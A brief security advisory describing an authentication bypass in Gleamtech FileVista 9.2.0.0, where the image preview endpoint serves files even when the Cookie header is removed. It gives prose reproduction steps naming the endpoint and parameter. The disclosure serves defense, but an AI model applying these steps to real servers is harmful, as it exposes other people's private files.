Gleamtech FileVista Incorrect Access Control Vulnerability in Image Preview Function

A vulnerability in Gleamtech FileVista version 9.2.0.0 allows remote attackers to bypass authentication and gain unauthorized access to sensitive image files. This issue arises from inadequate validation of authentication tokens on the server side, enabling attackers to remove authentication-related HTTP headers, such as the Cookie header, and access files without proper login credentials.

Impact

Exploitation of this vulnerability allows for unauthorized access to image files, bypassing authentication requirements.

Reproduction

To reproduce this vulnerability, send a GET request to the 'filemanager.ashx/GetImage' endpoint, including the 'fileName' parameter with the name of the image file to be accessed. Remove the Cookie header from the request to bypass authentication. The request can be made using a web browser or a tool like cURL, ensuring that the authentication-related headers are omitted.